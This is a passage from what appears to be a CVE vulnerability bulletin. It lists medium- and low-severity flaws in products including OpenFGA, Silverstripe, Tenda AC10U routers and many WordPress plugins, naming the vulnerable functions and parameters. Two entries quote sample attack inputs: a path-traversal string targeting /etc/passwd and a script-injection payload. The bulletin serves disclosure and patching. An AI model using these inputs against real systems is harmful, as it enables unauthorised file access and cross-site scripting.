OpenFGA, an authorization/permission engine, is vulnerable to a denial of service attack in versions prior to 1.4.3. In some scenarios that depend on the model and tuples used, a call to `ListObjects` may not release memory properly. So when a sufficiently high number of those calls are executed, the OpenFGA server can create an `out of memory` error and terminate. Version 1.4.3 contains a patch for this issue. | 2024-01-26 | 5.3 | CVE-2024-23820 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
| openlibraryfoundation — mod-remote-storage | Hard-coded credentials in mod-remote-storage versions under 1.7.2 and from 2.0.0 to 2.0.3 allows unauthorized users to gain read access to mod-inventory-storage records including instances, holdings, items, contributor-types, and identifier-types. | 2024-01-19 | 5.3 | CVE-2024-23685 disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com |
| owasp — dependency-check | DependencyCheck for Maven 9.0.0 to 9.0.6, for CLI version 9.0.0 to 9.0.5, and for Ant versions 9.0.0 to 9.0.5, when used in debug mode, allows an attacker to recover the NVD API Key from a log file. | 2024-01-19 | 5.3 | CVE-2024-23686 disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com |
| project_worlds — online_admission_system  |
A vulnerability was found in Project Worlds Online Admission System 1.0 and classified as critical. This issue affects some unknown processing of the file documents.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251699. | 2024-01-22 | 6.3 | CVE-2024-0783 cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| qidianbang — qdbcrm  |
A vulnerability was found in Qidianbang qdbcrm 1.1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /user/edit?id=2 of the component Password Reset. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252032. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-25 | 4.3 | CVE-2024-0880 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| qwdigital — linkwechat  |
A vulnerability was found in qwdigital LinkWechat 5.1.0. It has been classified as problematic. This affects an unknown part of the file /linkwechat-api/common/download/resource of the component Universal Download Interface. The manipulation of the argument name with the input /profile/../../../../../etc/passwd leads to path traversal: ‘../filedir’. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252033 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-25 | 4.3 | CVE-2024-0882 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| renzo_johnson — contact_form_7_extension_for_mailchimp  |
Server-Side Request Forgery (SSRF) vulnerability in Renzo Johnson Contact Form 7 Extension For Mailchimp.This issue affects Contact Form 7 Extension For Mailchimp: from n/a through 0.5.70. | 2024-01-24 | 4.9 | CVE-2024-22134 audit@patchstack.com |
| revenera — installshield  |
A vulnerability has been reported in Suite Setups built with versions prior to InstallShield 2023 R2. This vulnerability may allow locally authenticated users to cause a Denial of Service (DoS) condition when handling move operations on local, temporary folders. | 2024-01-26 | 5.5 | CVE-2023-29081 PSIRT-CNA@flexerasoftware.com |
| silverstripe — silverstripe-admin  |
Silverstripe Admin provides a basic management interface for the Silverstripe Framework. In versions on the 1.x branch prior to 1.13.19 and on the 2.x branch prior to 2.1.8, users who don’t have edit or delete permissions for records exposed in a `ModelAdmin` can still edit or delete records using the CSV import form, provided they have create permissions. The likelihood of a user having create permissions but not having edit or delete permissions is low, but it is possible. Note that this doesn’t affect any `ModelAdmin` which has had the import form disabled via the `showImportForm` public property. Versions 1.13.19 and 2.1.8 contain a patch for the issue. Those who have a custom implementation of `BulkLoader` should update their implementations to respect permissions when the return value of `getCheckPermissions()` is true. Those who use any `BulkLoader` in their own project logic, or maintain a module which uses it, should consider passing `true` to `setCheckPermissions()` if the data is provided by users. | 2024-01-23 | 4.3 | CVE-2023-49783 security-advisories@github.com security-advisories@github.com |
| silverstripe — silverstripe-framework  |
Silverstripe Framework is the framework that forms the base of the Silverstripe content management system. Prior to versions 4.13.39 and 5.1.11, if a user should not be able to see a record, but that record can be added to a `GridField` using the `GridFieldAddExistingAutocompleter` component, the record’s title can be accessed by that user. Versions 4.13.39 and 5.1.11 contain a fix for this issue. | 2024-01-23 | 4.3 | CVE-2023-48714 security-advisories@github.com security-advisories@github.com |
| silverstripe — silverstripe-graphql  |
The Silverstripe CMS GraphQL Server serves Silverstripe data as GraphQL representations. In versions 4.0.0 prior to 4.3.7 and 5.0.0 prior to 5.1.3, `canView` permission checks are bypassed for ORM data in paginated GraphQL query results where the total number of records is greater than the number of records per page. Note that this also affects GraphQL queries which have a limit applied, even if the query isn’t paginated per se. This has been fixed in versions 4.3.7 and 5.1.3 by ensuring no new records are pulled in from the database after performing `canView` permission checks for each page of results. This may result in some pages in the query results having less than the maximum number of records per page even when there are more pages of results. This behavior is consistent with how pagination works in other areas of Silverstripe CMS, such as in `GridField`, and is a result of having to perform permission checks in PHP rather than in the database directly. One may disable these permission checks by disabling the `CanViewPermission` plugin. | 2024-01-23 | 5.3 | CVE-2023-44401 security-advisories@github.com security-advisories@github.com |
| sourcecodester — online_tours_&_travels_management_system  |
A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been declared as critical. This vulnerability affects the function prepare of the file admin/pay.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252034 is the identifier assigned to this vulnerability. | 2024-01-25 | 6.3 | CVE-2024-0883 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| sourcecodester — online_tours_&_travels_management_system  |
A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. This issue affects the function exec of the file payment.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252035. | 2024-01-25 | 4.7 | CVE-2024-0884 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| spip — spip | SPIP before 4.1.14 and 4.2.x before 4.2.8 allows XSS via the name of an uploaded file. This is related to javascript/bigup.js and javascript/bigup.utils.js. | 2024-01-19 | 6.1 | CVE-2024-23659 cve@mitre.org cve@mitre.org cve@mitre.org |
| splunk — splunk_enterprise  |
In Splunk Enterprise versions below 9.0.8 and 9.1.3, Splunk app key value store (KV Store) improperly handles permissions for users that use the REST application programming interface (API). This can potentially result in the deletion of KV Store collections. | 2024-01-22 | 6.5 | CVE-2024-23675 prodsec@splunk.com prodsec@splunk.com |
| splunk — splunk_enterprise  |
In Splunk versions below 9.0.8 and 9.1.3, the “mrollup” SPL command lets a low-privileged user view metrics on an index that they do not have permission to view. This vulnerability requires user interaction from a high-privileged user to exploit. | 2024-01-22 | 4.6 | CVE-2024-23676 prodsec@splunk.com prodsec@splunk.com |
| splunk — splunk_enterprise  |
In Splunk Enterprise versions below 9.0.8, the Splunk RapidDiag utility discloses server responses from external applications in a log file. | 2024-01-22 | 4.3 | CVE-2024-23677 prodsec@splunk.com |
| squid-cache — squid  |
Squid is a caching proxy for the Web. Due to an expired pointer reference bug, Squid prior to version 6.6 is vulnerable to a Denial of Service attack against Cache Manager error responses. This problem allows a trusted client to perform Denial of Service when generating error pages for Client Manager reports. Squid older than 5.0.5 have not been tested and should be assumed to be vulnerable. All Squid-5.x up to and including 5.9 are vulnerable. All Squid-6.x up to and including 6.5 are vulnerable. This bug is fixed by Squid version 6.6. In addition, patches addressing this problem for the stable releases can be found in Squid’s patch archives. As a workaround, prevent access to Cache Manager using Squid’s main access control: `http_access deny manager`. | 2024-01-24 | 6.5 | CVE-2024-23638 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
| stanfordvl — gibsonenv  |
A vulnerability was found in StanfordVL GibsonEnv 0.3.1. It has been classified as critical. Affected is the function cloudpickle.load of the file gibsonutilspposgd_fuse.py. The manipulation leads to deserialization. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252204. | 2024-01-27 | 5 | CVE-2024-0959 cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| strangebee — thehive | StrangeBee TheHive 5.1.0 to 5.1.9 and 5.2.0 to 5.2.8 is vulnerable to Cross Site Scripting (XSS) in the case attachment functionality which enables an attacker to upload a malicious HTML file with Javascript code that will be executed in the context of the The Hive application using a specific URL. The vulnerability can be used to coerce a victim account to perform specific actions on the application as helping an analyst becoming administrator. | 2024-01-19 | 5.4 | CVE-2024-22876 cve@mitre.org |
| strangebee — thehive | StrangeBee TheHive 5.2.0 to 5.2.8 is vulnerable to Cross Site Scripting (XSS) in the case reporting functionality. This feature allows an attacker to insert malicious JavaScript code inside the template or its variables, that will be executed in the context of the TheHive application when the HTML report is opened. | 2024-01-19 | 5.4 | CVE-2024-22877 cve@mitre.org |
| swftools — swftools | A heap-use-after-free was found in SWFTools v0.9.2, in the function input at lex.swf5.c:2620. It allows an attacker to cause denial of service. | 2024-01-19 | 5.5 | CVE-2024-22914 cve@mitre.org |
| swftools — swftools | swftools 0.9.2 was discovered to contain an Out-of-bounds Read vulnerability via the function dict_do_lookup in swftools/lib/q.c:1190. | 2024-01-19 | 5.5 | CVE-2024-22957 cve@mitre.org |
| synaptics — synaptics_fingerprint_driver  |
Use of encryption key derived from static information in Synaptics Fingerprint Driver allows an attacker to set up a TLS session with the fingerprint sensor and send restricted commands to the fingerprint sensor. This may allow an attacker, who has physical access to the sensor, to enroll a fingerprint into the template database. | 2024-01-27 | 5.2 | CVE-2023-6482 PSIRT@synaptics.com |
| synology — diskstation_manager_(dsm) Â |
URL redirection to untrusted site (‘Open Redirect’) vulnerability in file access component in Synology DiskStation Manager (DSM) before 7.2.1-69057-2 allows remote authenticated users to conduct phishing attacks via unspecified vectors. | 2024-01-24 | 4.1 | CVE-2024-0854 security@synology.com |
| tenda — ac10u  |
A vulnerability classified as critical was found in Tenda AC10U 15.03.06.49_multi_TDE01. Affected by this vulnerability is the function formQuickIndex. The manipulation of the argument PPPOEPassword leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252127. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 4.7 | CVE-2024-0922 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| tenda — ac10u  |
A vulnerability, which was classified as critical, has been found in Tenda AC10U 15.03.06.49_multi_TDE01. Affected by this issue is the function formSetDeviceName. The manipulation of the argument devName leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252128. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 4.7 | CVE-2024-0923 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| tenda — ac10u  |
A vulnerability, which was classified as critical, was found in Tenda AC10U 15.03.06.49_multi_TDE01. This affects the function formSetPPTPServer. The manipulation of the argument startIp leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252129 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 4.7 | CVE-2024-0924 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| tenda — ac10u  |
A vulnerability has been found in Tenda AC10U 15.03.06.49_multi_TDE01 and classified as critical. This vulnerability affects the function formSetVirtualSer. The manipulation of the argument list leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252130 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 4.7 | CVE-2024-0925 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| tenda — ac10u  |
A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01 and classified as critical. This issue affects the function formWifiWpsOOB. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252131. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 4.7 | CVE-2024-0926 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| tenda — ac10u  |
A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01. It has been classified as critical. Affected is the function fromAddressNat. The manipulation of the argument entrys/mitInterface/page leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252132. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 4.7 | CVE-2024-0927 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| tenda — ac10u  |
A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01. It has been declared as critical. Affected by this vulnerability is the function fromDhcpListClient. The manipulation of the argument page/listN leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252133 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 4.7 | CVE-2024-0928 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| tenda — ac10u  |
A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01. It has been rated as critical. Affected by this issue is the function fromNatStaticSetting. The manipulation of the argument page leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252134 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 4.7 | CVE-2024-0929 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| tenda — ac10u  |
A vulnerability classified as critical has been found in Tenda AC10U 15.03.06.49_multi_TDE01. This affects the function fromSetWirelessRepeat. The manipulation of the argument wpapsk_crypto leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252135. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 4.7 | CVE-2024-0930 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| tenda — ac10u  |
A vulnerability classified as critical was found in Tenda AC10U 15.03.06.49_multi_TDE01. This vulnerability affects the function saveParentControlInfo. The manipulation of the argument deviceId/time/urls leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252136. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 4.7 | CVE-2024-0931 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| tenda — ac10u  |
A vulnerability, which was classified as critical, has been found in Tenda AC10U 15.03.06.49_multi_TDE01. This issue affects the function setSmartPowerManagement. The manipulation of the argument time leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252137 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 4.7 | CVE-2024-0932 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| the_notary_project — the_notary_project  |
The Notary Project is a set of specifications and tools intended to provide a cross-industry standard for securing software supply chains by using authentic container images and other OCI artifacts. An external actor with control of a compromised container registry can provide outdated versions of OCI artifacts, such as Images. This could lead artifact consumers with relaxed trust policies (such as `permissive` instead of `strict`) to potentially use artifacts with signatures that are no longer valid, making them susceptible to any exploits those artifacts may contain. In Notary Project, an artifact publisher can control the validity period of artifact by specifying signature expiry during the signing process. Using shorter signature validity periods along with processes to periodically resign artifacts, allows artifact producers to ensure that their consumers will only receive up-to-date artifacts. Artifact consumers should correspondingly use a `strict` or equivalent trust policy that enforces signature expiry. Together these steps enable use of up-to-date artifacts and safeguard against rollback attack in the event of registry compromise. The Notary Project offers various signature validation options such as `permissive`, `audit` and `skip` to support various scenarios. These scenarios includes 1) situations demanding urgent workload deployment, necessitating the bypassing of expired or revoked signatures; 2) auditing of artifacts lacking signatures without interrupting workload; and 3) skipping of verification for specific images that might have undergone validation through alternative mechanisms. Additionally, the Notary Project supports revocation to ensure the signature freshness. Artifact publishers can sign with short-lived certificates and revoke older certificates when necessary. This revocation serves as a signal to inform artifact consumers that the corresponding unexpired artifact is no longer approved by the publisher. This enables the artifact publisher to control the validity of the signature independently of their ability to manage artifacts in a compromised registry. | 2024-01-19 | 4 | CVE-2024-23332 security-advisories@github.com security-advisories@github.com |
| themegrill — colormag | The ColorMag theme for WordPress is vulnerable to unauthorized access due to a missing capability check on the plugin_action_callback() function in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins. | 2024-01-20 | 6.5 | CVE-2024-0679 security@wordfence.com security@wordfence.com security@wordfence.com |
| thomas_maier — image_source_control_lite-show_image_credits_and_captions  |
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Thomas Maier Image Source Control Lite – Show Image Credits and Captions. This issue affects Image Source Control Lite – Show Image Credits and Captions: from n/a through 2.17.0. | 2024-01-27 | 5.3 | CVE-2023-52187 audit@patchstack.com |
| tongda — oa_2017 Â |
A vulnerability, which was classified as critical, was found in Tongda OA 2017 up to 11.9. This affects an unknown part of the file /general/email/inbox/delete_webmail.php. The manipulation of the argument WEBBODY_ID_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-252183. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 5.5 | CVE-2024-0938 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| trillium-rs — trillium  |
Trillium is a composable toolkit for building internet applications with async rust. In `trillium-http` prior to 0.3.12 and `trillium-client` prior to 0.5.4, insufficient validation of outbound header values may lead to request splitting or response splitting attacks in scenarios where attackers have sufficient control over headers. This only affects use cases where attackers have control of request headers, and can insert “rn” sequences. Specifically, if untrusted and unvalidated input is inserted into header names or values. Outbound `trillium_http::HeaderValue` and `trillium_http::HeaderName` can be constructed infallibly and were not checked for illegal bytes when sending requests from the client or responses from the server. Thus, if an attacker has sufficient control over header values (or names) in a request or response that they could inject `rn` sequences, they could get the client and server out of sync, and then pivot to gain control over other parts of requests or responses. (i.e. exfiltrating data from other requests, SSRF, etc.) In `trillium-http` versions 0.3.12 and later, if a header name is invalid in server response headers, the specific header and any associated values are omitted from network transmission. Additionally, if a header value is invalid in server response headers, the individual header value is omitted from network transmission. Other headers values with the same header name will still be sent. In `trillium-client` versions 0.5.4 and later, if any header name or header value is invalid in the client request headers, awaiting the client Conn returns an `Error::MalformedHeader` prior to any network access. As a workaround, Trillium services and client applications should sanitize or validate untrusted input that is included in header values and header names. Carriage return, newline, and null characters are not allowed. | 2024-01-24 | 6.8 | CVE-2024-23644 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
| tutao — tutanota  |
Tuta is an encrypted email service. In versions prior to 119.10, an attacker can attach an image in a html mail which is loaded from external resource in the default setting, which should prevent loading of external resources. When displaying emails containing external content, they should be loaded by default only after confirmation by the user. However, it could be recognized that certain embedded images (see PoC) are loaded, even though the “Automatic Reloading of Images” function is disabled by default. The reloading is also done unencrypted via HTTP and redirections are followed. This behavior is unexpected for the user, since the user assumes that external content will only be loaded after explicit manual confirmation. The loading of external content in e-mails represents a risk, because this makes the sender aware that the e-mail address is used, when the e-mail was read, which device is used and expose the user’s IP address. Version 119.10 contains a patch for this issue. | 2024-01-23 | 5.3 | CVE-2024-23330 security-advisories@github.com |
| unix4lyfe — darkhttpd | darkhttpd through 1.15 allows local users to discover credentials (for –auth) by listing processes and their arguments. | 2024-01-22 | 5.5 | CVE-2024-23770 cve@mitre.org cve@mitre.org cve@mitre.org |
| van_der_schaar_lab — synthcity  |
A vulnerability, which was classified as critical, has been found in van_der_Schaar LAB synthcity 0.2.9. Affected by this issue is the function load_from_file of the component PKL File Handler. The manipulation leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252182 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early and confirmed immediately the existence of the issue. A patch is planned to be released in February 2024. | 2024-01-26 | 6.3 | CVE-2024-0937 cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| van_der_schaar_lab — temporai  |
A vulnerability classified as critical was found in van_der_Schaar LAB TemporAI 0.0.3. Affected by this vulnerability is the function load_from_file of the component PKL File Handler. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252181 was assigned to this vulnerability. NOTE: The vendor was contacted early and confirmed immediately the existence of the issue. A patch is planned to be released in February 2024. | 2024-01-26 | 6.3 | CVE-2024-0936 cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| vektor-inc — vk_block_patterns | The VK Block Patterns plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.31.1.1. This is due to missing or incorrect nonce validation on the vbp_clear_patterns_cache() function. This makes it possible for unauthenticated attackers to clear the patterns cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-01-20 | 4.3 | CVE-2024-0623 security@wordfence.com security@wordfence.com |
| wordpress — wordpress | The SEOPress WordPress plugin before 7.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed | 2024-01-22 | 4.8 | CVE-2023-6290 contact@wpscan.com |
| wordpress — wordpress  |
The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the map id parameter in all versions up to, and including, 9.0.28 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-01-24 | 6.1 | CVE-2023-6697 security@wordfence.com security@wordfence.com |
| wordpress — wordpress  |
The AMP for WP – Accelerated Mobile Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘disqus_name’ parameter in all versions up to, and including, 1.0.92.1 due to insufficient input sanitization and output escaping on the executed JS file. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-01-23 | 6.1 | CVE-2024-0587 security@wordfence.com security@wordfence.com |
| wordpress — wordpress  |
The WP Customer Area plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘tab’ parameter in all versions up to, and including, 8.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-01-24 | 6.1 | CVE-2024-0665 security@wordfence.com security@wordfence.com security@wordfence.com |
| wordpress — wordpress  |
The Backuply – Backup, Restore, Migrate and Clone plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.2.3 via the node_id parameter in the backuply_get_jstree function. This makes it possible for attackers with administrator privileges or higher to read the contents of arbitrary files on the server, which can contain sensitive information. | 2024-01-27 | 6.5 | CVE-2024-0697 security@wordfence.com security@wordfence.com |
| wordpress — wordpress  |
The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Link Anything functionality in all versions up to, and including, 2.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-01-27 | 6.4 | CVE-2024-0824 security@wordfence.com security@wordfence.com |
| wordpress — wordpress  |
The Category Discount Woocommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpcd_save_discount() function in all versions up to, and including, 4.12. This makes it possible for unauthenticated attackers to modify product category discounts that could lead to loss of revenue. | 2024-01-25 | 5.3 | CVE-2024-0617 security@wordfence.com security@wordfence.com security@wordfence.com |
| wordpress — wordpress  |
The Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.7. This is due to missing or incorrect nonce validation on the pmpro_update_level_order() function. This makes it possible for unauthenticated attackers to update the order of levels via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-01-25 | 5.3 | CVE-2024-0624 security@wordfence.com security@wordfence.com security@wordfence.com |
| wordpress — wordpress  |
The Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.15.21. This is due to missing or incorrect nonce validation on the ‘execute’ function. This makes it possible for unauthenticated attackers to execute arbitrary methods in the ‘BoosterController’ class via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-01-27 | 5.4 | CVE-2024-0667 security@wordfence.com security@wordfence.com security@wordfence.com |
| wordpress — wordpress  |
The WordPress Simple Shopping Cart plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the automatic redirect URL setting in all versions up to and including 4.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2024-01-27 | 4.4 | CVE-2023-6497 security@wordfence.com security@wordfence.com |
| wordpress — wordpress  |
The Contact Form Plugin – Fastest Contact Form Builder Plugin for WordPress by Fluent Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via imported form titles in all versions up to, and including, 5.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2024-01-27 | 4.4 | CVE-2024-0618 security@wordfence.com security@wordfence.com security@wordfence.com |
| wordpress — wordpress  |
The WPFront Notification Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘wpfront-notification-bar-options[custom_class]’ parameter in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2024-01-25 | 4.4 | CVE-2024-0625 security@wordfence.com security@wordfence.com security@wordfence.com |
| wordpress — wordpress  |
The Meks Smart Social Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Meks Smart Social Widget in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2024-01-27 | 4.4 | CVE-2024-0664 security@wordfence.com security@wordfence.com |
| wordpress — wordpress  |
The “WebSub (FKA. PubSubHubbub)” plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin settings in all versions up to, and including, 3.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-01-25 | 4.4 | CVE-2024-0688 security@wordfence.com security@wordfence.com |
| wordpress — wordpress  |
The Sticky Buttons – floating buttons builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via sticky URLs in all versions up to, and including, 3.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2024-01-23 | 4.4 | CVE-2024-0703 security@wordfence.com security@wordfence.com |
| wp-eventmanager — user_profile_avatar | The WP User Profile Avatar WordPress plugin before 1.0.1 does not properly check for authorisation, allowing authors to delete and update arbitrary avatar | 2024-01-22 | 4.3 | CVE-2023-6384 contact@wpscan.com |
| wpmet — wp_social_login_and_register_social_counter | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wpmet Wp Social Login and Register Social Counter.This issue affects Wp Social Login and Register Social Counter: from n/a through 1.9.0. | 2024-01-19 | 6.5 | CVE-2022-47160 audit@patchstack.com |
| yugeshverma — student_project_allocation_system | A vulnerability was found in Project Worlds Student Project Allocation System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin_login.php of the component Admin Login Module. The manipulation of the argument msg with the input test%22%3Cscript%3Ealert(%27Torada%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251549 was assigned to this vulnerability. | 2024-01-19 | 6.1 | CVE-2024-0726 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| zulip — zulip  |
Zulip is an open-source team collaboration tool. A vulnerability in version 8.0 is similar to CVE-2023-32677, but applies to multi-use invitations, not single-use invitation links as in the prior CVE. Specifically, it applies when the installation has configured non-admins to be able to invite users and create multi-use invitations, and has also configured only admins to be able to invite users to streams. As in CVE-2023-32677, this does not let users invite new users to arbitrary streams, only to streams that the inviter can already see. Version 8.1 fixes this issue. As a workaround, administrators can limit sending of invitations down to users who also have the permission to add users to streams. | 2024-01-25 | 4.3 | CVE-2024-21630 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
Low Vulnerabilities
| Primary Vendor — Product |
Description | Published | CVSS Score | Source & Patch Info |
|---|---|---|---|---|
| changedetection — changedetection | changedetection.io is an open source tool designed to monitor websites for content changes. In affected versions the API endpoint `/api/v1/watch/ |
2024-01-19 | 3.7 | CVE-2024-23329 security-advisories@github.com security-advisories@github.com |
| codeastro — internet_banking_system  |
